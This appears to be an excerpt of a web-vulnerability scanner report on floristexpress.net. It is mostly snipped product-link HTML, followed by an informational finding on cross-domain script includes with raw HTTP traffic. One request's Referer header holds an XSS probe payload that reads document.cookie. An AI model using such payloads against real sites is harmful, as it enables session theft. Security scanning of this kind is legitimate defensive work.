<a href="http://www.floristexpress.net/products/its_your_happy_birthday_cake.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN571G.jpg" border="0" alt="A truly outstanding gift for anyone special, this one-of-a-kind cake-shaped..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/its_your_happy_birthday_cake.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_your_valentine.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN90971A.jpg" border="0" alt="For her. From you. A bountiful bouquet of romantic red roses, exotic alstro..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_your_valentine.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_peace_lily.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN781G.jpg" border="0" alt="Make a beautiful statement by sending this fresh peace lily to someone spec..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_peace_lily.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/12_dozen_premium_red_roses.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-SIX.jpg" border="0" alt="Send a simply elegant arrangement of 6 classic red roses beautifully arrang..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/12_dozen_premium_red_roses.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/birthday_brilliance.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN541G.jpg" border="0" alt="A fabulous way to celebrate someone's birthday in an extraordinary way! Our..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/birthday_brilliance.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_sprinkling_of_springtime_-_gerbera_daisy.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN57-13J.jpg" border="0" alt="Sprinkle some sunshine on someone's day with a cheerful gerbera daisy plant..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_sprinkling_of_springtime_-_gerbera_daisy.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/lily_la_rose_3.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN73-13J.jpg" border="0" alt="A splendid display of color! Hand selected by floral artisans are fiery ora..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/lily_la_rose_3.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sheer_pink_delight.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN76-11J.jpg" border="0" alt="A delicate and feminine choice is our rose 4&quot; cube vase with one dozen rose..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sheer_pink_delight.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/amazing_azalea.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN55-21J.jpg" border="0" alt="Fabulous and fragrant, our gorgeous fresh azalea plant is a wonderful way t..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/amazing_azalea.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/joyful_bloom.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN301G.jpg" border="0" alt="Mark her special day with a brilliant assortment of flowers and greens. Stu..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/joyful_bloom.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/rhapsody_in_red.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN40-11J.jpg" border="0" alt="Any day becomes a special one with this brilliant presentation of pink and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/rhapsody_in_red.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/fresh_fruit_and_candy_gift_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN93558.jpg" border="0" alt="Send this Fresh Fruit & Candy Gift Basket and you're sending sunshine - and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/fresh_fruit_and_candy_gift_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_dish_garden.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1890.jpg" border="0" alt="Stunning varieties of fresh green plants are used to create our classic di..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_dish_garden.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/spring_lilies.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-108.jpg" border="0" alt="Send a summery burst of sunshine with this gorgeous lily bouquet. Lilies ha..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/spring_lilies.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/blushing_beauty_2.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN31-21J.jpg" border="0" alt="Any day becomes a special one with this brilliant presentation of pink and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/blushing_beauty_2.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/designers_choice.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-DC.jpg" border="0" alt="Not quite sure what to send? Let our top notch designers create a gift bask..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/designers_choice.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/youre_the_best.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN231G.jpg" border="0" alt="A simple, yet elegant way of showing you care. Deep pink gerbera daisies ar..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/youre_the_best.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sweet_delights.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN38-21J.jpg" border="0" alt="Make any day an unforgettable one with this exceptional display of beauty a..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sweet_delights.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_baby_boy_with_keepsake_frame.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN17162.jpg" border="0" alt="Boy, oh boy, it's a boy! Here's a gift for the new parents that welcomes th..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_baby_boy_with_keepsake_frame.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/three_dozen_red_roses.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-3DZ.jpg" border="0" alt="Roses are the definitive expression of lasting love! Send three-dozen long-..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/three_dozen_red_roses.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_beary_happy_birthday.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN562G.jpg" border="0" alt="Say &quot;Happy Birthday&quot; in a big way when you send someone special this unique..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_beary_happy_birthday.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/white_daisy_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN90917.jpg" border="0" alt="Daisies in a basket are a wonderful way gift for any occasion. Our fresh, w..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/white_daisy_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/fruit_sweets_and_treats_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN5382.jpg" border="0" alt="Treat someone special with an overflowing array of gourmet gifts. Delivered..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/fruit_sweets_and_treats_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/premium_long_stem_red_roses_18_stems.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1121RDA.jpg" border="0" alt="To make an ordinary day simply unforgettable, eighteen long-stem assorted r..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/premium_long_stem_red_roses_18_stems.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_anniversary_bouquet.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-ANN.jpg" border="0" alt="Can't decide what to send for an anniversary? Why not leave it to the profe..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_anniversary_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/white_and_yellow_birthday_cake.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-101.jpg" border="0" alt="This cake looks so good you almost want to eat it! A birthday cake made ent..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/white_and_yellow_birthday_cake.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/birthday_florist_designed_bouquet.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-BIR.jpg" border="0" alt="Let our top notch florists design a bouquet with their freshest flowers and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/birthday_florist_designed_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/plants_a-plenty.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN822G.jpg" border="0" alt="A wonderful expression for any occasion, our plentiful arrangement of fresh..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/plants_a-plenty.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/two_dozen_premium_long_stem_red_roses_2.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1122.jpg" border="0" alt="Because your sweetheart deserves to be romanced twice as much, send 24 of t..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/two_dozen_premium_long_stem_red_roses_2.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/loves_burning_bright.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN9-11J.jpg" border="0" alt="Convey your everlasting love with this distinctive cube design showcasing a..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/loves_burning_bright.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/party_on_gourmet_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN881G.jpg" border="0" alt="A welcome present for any occasion, our gourmet food basket makes a fantast..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/party_on_gourmet_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/pure_perfection.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN40-21J.jpg" border="0" alt="Our Pure Perfection arrangement is a memorable piece of floral design that..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/pure_perfection.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_toast_to_you.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN661G.jpg" border="0" alt="An outstanding way to applaud someone's good fortune is with our unique and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/a_toast_to_you.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sympathy_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN1022G.jpg" border="0" alt="Let someone know you are thinking about them at this difficult time by send..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sympathy_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/regal_orchids_2.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN55-11J.jpg" border="0" alt="Exotic orchids create an exquisite display perfect for any setting. Stylish..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/regal_orchids_2.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/luscious_green_garden_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN831G.jpg" border="0" alt="Send this bountiful green garden as a wonderful way to express your good th..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/luscious_green_garden_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_congratulations_bouquet.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/FYF-CON.jpg" border="0" alt="Have your flowers delivered in a glass vase. Let our top notch florists des..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/florist_designed_congratulations_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/happy_birthday_balloon_bouquet.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN551G.jpg" border="0" alt="Send wishes for a very happy birthday with this fun bouquet. Filled with 10..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/happy_birthday_balloon_bouquet.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/daffodil_delight.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN13-31J.jpg" border="0" alt="Simple yet elegant, vibrant yellow daffodils, eucalyptus and jade create a..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/daffodil_delight.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/orchard_fresh_fruit_and_snacks_gift_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN93556.jpg" border="0" alt="Send a beautiful gift of nature's sun kissed best and sweet and savory snac..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/orchard_fresh_fruit_and_snacks_gift_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/deluxe_all_fruit_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN91495.jpg" border="0" alt="Delightfully deluxe -- that's our abundant basket of fresh fruit, selected..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/deluxe_all_fruit_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/heaven_on_earth.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN44-21J.jpg" border="0" alt="Gorgeous fresh flowers including red and orange asiatic lilies, orange and..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/heaven_on_earth.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_bud_vase_roses.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN971G.jpg" border="0" alt="Three long-stemmed deep red roses are beautifully arranged with baby's brea..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/classic_bud_vase_roses.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_baby_girl_with_keepsake_frame.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN17161.jpg" border="0" alt="Sugar and spice and everything nice...is what this gift for the new parents..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/bouquet_for_baby_girl_with_keepsake_frame.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/kalanchoe_garden_basket.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN62-11J.jpg" border="0" alt="Send this bountiful Kalanchoe Garden Basket as a wonderful way to express y..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/kalanchoe_garden_basket.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/romance_of_roses.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN932G.jpg" border="0" alt="Our Romance of Roses arrangement is an extraordinary display of floral beau..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/romance_of_roses.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/thinking_of_you.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN342G.jpg" border="0" alt="A wonderful way to let someone know they're in your thoughts, our Thinking..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/thinking_of_you.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sunshine_garden.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN821G.jpg" border="0" alt="Show someone special how much you care in a delightful way. This decorative..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/sunshine_garden.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/happy_healing.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN24-21J.jpg" border="0" alt="Send your hopes for a speedy recovery with this hand crafted assortment of..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/happy_healing.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cuddle_up__get_well.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN631G.jpg" border="0" alt="When someone special isn't feeling well, cheer them up with our unique arra..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cuddle_up__get_well.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/ode_to_orchids.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN20-11J.jpg" border="0" alt="Striking white orchids and bronze protea combine with blades of steel grass..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/ode_to_orchids.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cheery__bright.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN38-11J.jpg" border="0" alt="This one-of-a-kind presentation is sure to cheer anyone up! Expertly design..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/cheery__bright.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/basket_of_well_wishes.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN641G.jpg" border="0" alt="Help put a smile on the face of someone you care about when they aren't fee..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/basket_of_well_wishes.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/the_rose_garden.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN52-11J.jpg" border="0" alt="Make any day unforgettable with this exceptional display of beauty and grac..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/the_rose_garden.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/peace_plant.htm"><img width="170" height="198" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/products/small/BN58-21J.jpg" border="0" alt="A stunning display of peace and tranquility with a modern twist! Our 10&quot; sp..."></a>
...[SNIP]...
<a href="http://www.floristexpress.net/products/peace_plant.htm"><img src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/buynow.gif" border="0"></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/s_code.js"></script>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.floristexpress.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?refcode=ORD&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.210CKOUU; path=/
Date: Fri, 11 Feb 2011 18:53:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=68ab3544b96e60a3e65d7fb635fc5b2a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=227e64ab9387a195da7e801f19393cb9; path=/
Set-Cookie: ref_code=ORD; path=/
Content-Type: text/html
Content-Length: 102803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
<div id="navPad">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/topNav.js"></script>
...[SNIP]...
<td class="mainCell" style="padding: 3px 10px 5px 10px;">
<script language="javascript" type="text/javascript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/js/products.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/s_code.js"></script>
...[SNIP]...

5.2. http://www.floristexpress.net/cart.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /cart.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cart.htm HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
